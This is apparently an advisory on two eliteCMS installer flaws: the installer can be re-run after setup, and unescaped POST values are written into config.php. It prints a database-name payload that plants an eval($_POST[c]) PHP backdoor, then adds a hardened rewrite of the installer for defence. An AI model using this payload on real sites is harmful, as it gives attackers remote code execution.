eliteCMS's installer is never locked after installation finishes, so anyone who can reach the installer URL can simply run the installation again.

A second flaw is that the installer can be made to write a one-line PHP backdoor straight into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated into PHP source text without any escaping.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from the POST request without any validation.

If the POSTed database name is:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor ends up written into /admin/includes/config.php.
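As an added example that is not part of the original post or of eliteCMS, this is what a hardened version of the step-4 config writer could look like: it refuses to run once an install lock exists, allow-lists the host, database and user names, and emits every value with var_export() so it lands in the file as a PHP string literal instead of raw source text. The function names and the lock-file path are assumptions for the illustration.

```php
<?php
// Added example, not eliteCMS code. Names below (write_config,
// validate_db_settings, INSTALL_LOCK) are assumptions for this illustration.

define('INSTALL_LOCK', __DIR__ . '/install.lock');   // assumed lock-file path

/**
 * Validate the DB settings posted to the installer.
 * Host, database and user names get a strict allow-list; the password may
 * contain anything but is never interpolated into source text (see below).
 */
function validate_db_settings(array $post): array
{
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
    ];
    $clean = [];
    foreach ($rules as $key => $re) {
        $val = $post[$key] ?? '';
        if (!is_string($val) || !preg_match($re, $val)) {
            throw new InvalidArgumentException("Invalid value for $key");
        }
        $clean[$key] = $val;
    }
    $clean['DB_PASS'] = (string) ($post['DB_PASS'] ?? '');
    return $clean;
}

/** Write config.php once: refuse a second run and emit values as PHP literals. */
function write_config(string $file, array $post): void
{
    if (file_exists(INSTALL_LOCK)) {
        throw new RuntimeException('Installer already ran; remove the install directory.');
    }
    $settings = validate_db_settings($post);
    $out = "<?php\n";
    foreach ($settings as $key => $value) {
        // var_export() yields a quoted, escaped PHP string literal, so a value
        // carrying a closing PHP tag or quotes cannot break out of the string.
        $out .= 'define(' . var_export($key, true) . ', ' . var_export($value, true) . ");\n";
    }
    if (file_put_contents($file, $out, LOCK_EX) === false) {
        throw new RuntimeException("Cannot write $file");
    }
    touch(INSTALL_LOCK);   // lock the installer after a successful write
}
```

With this writer the database name from the post above fails the DB_NAME allow-list and the request is rejected before anything is written; even a value that slipped past the regex would be stored as an inert string literal.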